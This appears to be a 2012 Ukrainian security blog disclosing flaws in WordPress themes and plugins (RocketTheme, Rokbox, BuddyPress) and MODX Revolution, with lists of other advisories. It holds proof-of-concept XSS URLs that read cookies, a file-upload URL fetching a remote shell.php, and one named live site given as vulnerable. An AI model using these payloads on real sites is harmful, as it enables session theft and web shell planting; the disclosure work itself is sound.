Websecurity - Веб безпека

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Facebook Survey, FireStorm Real Estate та Madebymilk. Для котрих з’явилися експлоіти. Facebook Survey - це плагін для проведення опитування на FB, FireStorm Real Estate - це плагін для розміщення списків нерухомості, Madebymilk - це тема движка.

• WordPress Facebook Survey SQL Injection (деталі)
• WordPress FireStorm Real Estate 2.06.08 SQL Injection (деталі)
• WordPress Madebymilk SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Раніше я вже писав про численні уразливості в численних темах для WordPress виробництва RocketTheme. Окрім тем Afterburner, Refraction, Solarsentinel, Mixxmag, Iridium, Infuse, Perihelion, Replicant2, Affinity, Nexus, Sentinel, Mynxx Vestnikp, Mynxx, Moxy, Terrantribune, Meridian є ще інші уразливі теми (шаблони).

Я написав про 16 їхніх тем (серед яких було два різновиди двох тем), а всього у них 47 тем для WordPress. З них лише три безкоштовні, а всі інші теми від RocketTheme є платними (потрібно купити підписку в “клуб”, щоб отримати до них доступ). І Rokbox постачається з усіма цими темами, окрім Grunge, які мають всі раніше згадані уразливості.

В цих 32 темах, як і попередніх 16 (14 тем + 2 різновиди), мають місце Cross-Site Scripting, Content Spoofing, Full path disclosure та Information Leakage уразливості. Про що вже повідомив розробникам цих тем. Це наступні шаблони від RocketTheme: Voxel, Diametric, Ionosphere, Clarion, Halcyon, Visage, Enigma, Momentum, Radiance, Camber, Reflex, Modulus, Nebulae, Entropy, Tachyon, Mercado, Maelstrom, Syndicate, Paradox, Hybrid, Omnicron, Zephyr, Panacea, Somaxiom, Juxta, Quantive, Crystalline, Kinetic, Dominion, Reaction, Akiraka, Novus. А також шаблон Grunge має FPD дірки.

Content Spoofing (WASC-12):

http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg
http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?config=1.xml
http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site

XSS (WASC-08):

http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Full path disclosure (WASC-13):

У всіх цих темах є FPD в index.php (http://site/wordpress/wp-content/themes/rt_novus_wp/ і так само для інших тем), що спрацьовує при налаштуваннях PHP по замовчуванню. Також FPD потенційно є в інших php-файлах цих тем.

Information Leakage (WASC-13):

В деяких темах, подібно до rt_mixxmag_wp, може бути розміщений error log з FPD.

http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log

Уразливі всі версії всіх вищенаведених тем для WordPress.

26.07.2012

У липні, 04.07.2012, я виявив численні уразливості в системі MODX Revolution, зокрема Brute Force, Cross-Site Request Forgery, Abuse of Functionality та Insufficient Anti-automation. Які виявив на сайті www.gov.ua. Частково уразливості збігаються з MODx 1.0.х. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливості в MODx.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

27.12.2012

Brute Force (WASC-11):

В формі логіна (http://site/manager/) немає захисту від Brute Force атак.

Cross-Site Request Forgery (WASC-09):

Відсутність захисту від Brute Force (такого як капча) в формі логіна (http://site/manager/) також призводить до можливості проведення CSRF атаки, про що я писав в статті Атаки на незахищені логін форми. Це дозволяє проводити віддалений логін в акаунт (щоб проводити атаки на уразливості всередині акаунта). Це також може бути використано для автоматизованого входу в акаунт, фішинга та інших автоматизованих атак.

Abuse of Functionality (WASC-42):

В формі логіна (http://site/manager/) можна виявляти логіни користувачів (Login Enumeration). Різні повідомлення виводяться для коректних і некоректних логінів.

Insufficient Anti-automation (WASC-21):

Із-за відсутності захисту від автоматизованих атак в формі логіна, окрім Brute Force атак також можливі автоматизовані атаки на функції логіна (для автоматизованого виявлення логінів) та відновлення паролю (для виявлення емайлів користувачів). Обидва функціонали знаходяться на одній сторінці.

Уразливі всі весії MODx Revolution (2.x версії движка). Дані уразливості досі не виправлені розробниками. XSS дірки з www.gov.ua не відносяться до CMS - це власний код цього сайта.

31.12.2012

При включеному блокуванні на сайті з’являються дві нові уразливості (аналогічні діркам в MODx Evolution).

Abuse of Functionality (Login Enumeration) (WASC-42):

В формі логіна (http://site/manager/) можливий підбір логінів. Якщо блокування не спрацьовує після трьох запитів (як може бути встановлене на сайті), значить немає такого логіна в системі, тобто воно спрацьовує лише для робочих логінів. Атака можлива, якщо включене блокування.

Експлоіт:

MODx Revolution Abuse of Functionality-1.html

Abuse of Functionality (WASC-42):

Після знаходження логіна з вищезгаданою уразливістю можливе зловживання блокуванням акаунтів. Після трьох запитів (як може бути встановлене на сайті) акаунт може бути заблокований (навіть акаунт адміна). Постійно посилаючи запити до цього функціоналу (по три некоректні запити), можна постійно тримати акаунт заблокованим (в тому числі адмінський).

Експлоіт:

MODx Revolution Abuse of Functionality-2.html

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Portable phpMyAdmin, Plg Novana та Magazine Basic. Для котрих з’явилися експлоіти. Portable phpMyAdmin - це плагін для доступу в phpMyAdmin з адмінки WP, Plg Novana - це спеціальний плагін, Magazine Basic - це тема движка.

• portable-phpMyAdmin (WordPress Plugin) Authentication Bypass (деталі)
• WordPress Plg Novana SQL Injection (деталі)
• WordPress Magazine Basic SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• (0Day) HP Intelligent Management Center img.exe Integer Wrap Remote Code Execution Vulnerability (деталі)
• Multiple vulnerabilities in dotProject (деталі)
• ManageEngine ServiceDesk 8.0 - Multiple Vulnerabilities (деталі)
• Manage Engine Exchange Reporter v4.1 - Multiple Web Vulnerabilites (деталі)
• (0Day) HP LeftHand Virtual SAN Appliance Unauthenticated Access Remote Command Execution Vulnerability (деталі)
• tinymcpuk xss vulnerability (деталі)
• Multiple vulnerabilities in Achievo (деталі)
• SQL injection in FOOT Gestion (деталі)
• Endpoint Protector v4.0.4.0 - Multiple Web Vulnerabilities (деталі)
• Site Builder RumahWeb Arbitrary Config File Disclosure Vulnerability (деталі)

У грудні, 15.12.2012, я виявив Cross-Site Scripting, Content Spoofing, Full path disclosure та Information Leakage уразливості в численних темах для WordPress. Про що вже повідомив розробникам цих тем.

Це теми виробництва RocketTheme, розробників Rokbox. Дані уразливості подібні до уразливостей в темі Affinity BuddyPress.

Всього я знайшов 16 вразливих тем: Afterburner, Refraction, Solarsentinel, Mixxmag, Iridium, Infuse, Perihelion, Replicant2, Affinity, Nexus, Sentinel, Mynxx Vestnikp, Mynxx, Moxy, Terrantribune, Meridian.

Шляхи в цих темах наступні:

http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_refraction_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_solarsentinel_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/Mixxmag/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_iridium_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_infuse_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/infuse/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_perihelion_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_replicant2_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_affinity_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_nexus_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_sentinel/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_mynxx_wp_vestnikp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_mynxx_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt.mynxx.wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_moxy_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_terrantribune_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_meridian_wp/js/rokbox/jwplayer/jwplayer.swf

Content Spoofing (WASC-12):

http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?config=1.xml
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site

XSS (WASC-08):

http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Full path disclosure (WASC-13):

У всіх цих темах є FPD в index.php (http://site/wordpress/wp-content/themes/rt_afterburner_wp/ і так само для інших тем), що спрацьовує при налаштуваннях PHP по замовчуванню. Також FPD потенційно є в інших php-файлах цих тем.

Information Leakage (WASC-13):

Є сайти з темою rt_mixxmag_wp, що мають error log з FPD.

http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log

Приклад уразливого сайту з темою Mixxmag.

CS (WASC-12) і XSS (WASC-08):

http://securityuncorked.com/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/jwplayer/jwplayer.swf

Information Leakage (WASC-13):

http://securityuncorked.com/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log

Уразливі всі версії всіх вищенаведених тем для WordPress.

У грудні, 15.12.2012, я виявив Cross-Site Scripting та Content Spoofing уразливості в плагіні BuddyPress для WordPress та темі Affinity BuddyPress для даного плагіна. Про що вже повідомив розробників веб додатку та теми для плагіна.

Стосовно плагінів для WordPress раніше я писав про уразливості в Rokbox для WordPress.

Ці уразливості пов’язані з JWPlayer і Rokbox, що використовуються в BuddyPress та темі Affinity. Всього я виявив на різних сайтах наступні інсталяції BuddyPress або теми для нього: з JWPlayer 5.5.1641, з JWPlayer 4.2.95, з Rokbox з JW Player 4.4.198 (в темі Affinity). Сайтів з цими флешками небагато, тому це можуть бути старі версії чи якійсь рідкі версії BuddyPress.

Для JWPlayer 5.5.1641 шлях наступний: http://site/wp-content/plugins/buddypress/bp-themes/bp-default/jwplayer/player.swf

Для JWPlayer 4.2.95 шлях наступний: http://site/wp-content/plugins/buddypress/bp-themes/file/player.swf

Для JWPlayer 4.4.198 в темі Affinity для BuddyPress шлях наступний: http://site/wp-content/plugins/buddypress/bp-themes/rt_affinity_wp-bp12/js/rokbox/jwplayer/jwplayer.swf.

XSS (WASC-08):

http://site/wp-content/plugins/buddypress/bp-themes/bp-default/jwplayer/player.swf?playerready=alert(document.cookie)

В 5.x версіях JW Player має місце ця XSS та інші уразливості. В 4.x версіях JW Player мають місце лише наступні уразливості.

Content Spoofing (WASC-12):

http://site/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg
http://site/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?config=1.xml
http://site/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site

XSS (WASC-08):

http://site/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Уразливі версії BuddyPress з JW Player або з Rokbox з JW Player і тема Affinity BuddyPress 1.2 та попередні версії.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Zarzadzanie Kontem, Webplayer та FireStorm Real Estate. Для котрих з’явилися експлоіти. Zarzadzanie Kontem - це спеціальний плагін, Webplayer - це медіа плеєр, FireStorm Real Estate - це плагін для розміщення списків нерухомості.

• WordPress Zarzadzanie Kontem Shell Upload (деталі)
• WordPress Webplayer SQL Injection (деталі)
• WordPress FS-Real-Estate SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• EMC Cloud Tiering Appliance (CTA) Authentication Bypass Vulnerability (деталі)
• Multiple vulnerabilities in BabyGekko (деталі)
• Multiple Vulnerabilities in Smartphone Pentest Framework (SPF) (деталі)
• Open-Realty CMS 2.5.8 (2.x.x) <= Cross Site Request Forgery (CSRF) Vulnerability (деталі)
• HP Service Manager and HP Service Center Server, Remote Denial of Service (DoS) (деталі)
• SysAid Helpdesk Pro Blind SQL Injection (деталі)
• Squiz CMS File Path Traversal (деталі)
• SilverStripe CMS - Multiple Vulnerabilities (деталі)
• Cross-site scripting (XSS) vulnerability in HP Service Manager and HP Service Center (деталі)
• BugTracker.Net Multiple Security Vulnerabilities (деталі)

24.08.2012

У липні, 28.07.2012, я виявив численні уразливості в плагіні Rokbox для WordPress. Зокрема Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service, Arbitrary File Upload, Content Spoofing та Information Leakage уразливості. Про що найближчим часом повідомлю розробникам веб додатку.

Раніше я вже писав про уразливості в Rokbox для Joomla та WordPress. Стосовно плагінів для WordPress раніше я писав про уразливості в Organizer.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

14.12.2012

В плагіні Rokbox для WordPress використовуються TimThumb 1.16 та JW Player 4.4.198, тому окрім своїх власних дірок, він має ще дірки цих веб додатків.

На сайтах в основному використовується папка wp_rokbox, але трапляються сайти з папкою rokbox.

XSS (в Rokbox з більш старими версіями TimThumb) (WASC-08):

http://site/wp-content/plugins/wp_rokbox/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Та FPD, Abuse of Functionality і DoS в уразливості в TimThumb в усіх версіях Rokbox. А також Arbitrary File Upload уразливість, що була оприлюднена минулого року через 3,5 місяці після оприлюднення мною попередніх дірок.

AFU (WASC-31):

http://site/wp-content/plugins/wp_rokbox/thumb.php?src=http://flickr.com.site.com/shell.php

Content Spoofing (WASC-12):

http://site/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg
http://site/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?config=1.xml
http://site/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site

XSS (WASC-08):

http://site/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Information Leakage (WASC-13):

http://site/wp-content/plugins/wp_rokbox/error_log

Full path disclosure (WASC-13):

http://site/wp-content/plugins/wp_rokbox/rokbox.php

До CS і XSS в JW Player і FPD вразливі всі версії Rokbox для WordPress (Rokbox 2.13 і попередні), а от IL та уразливості в TimThumb були виправлені. Після мого повідомлення в серпні розробники замінили TimThumb на phpThumb, тому версія 2.13 невразлива до них.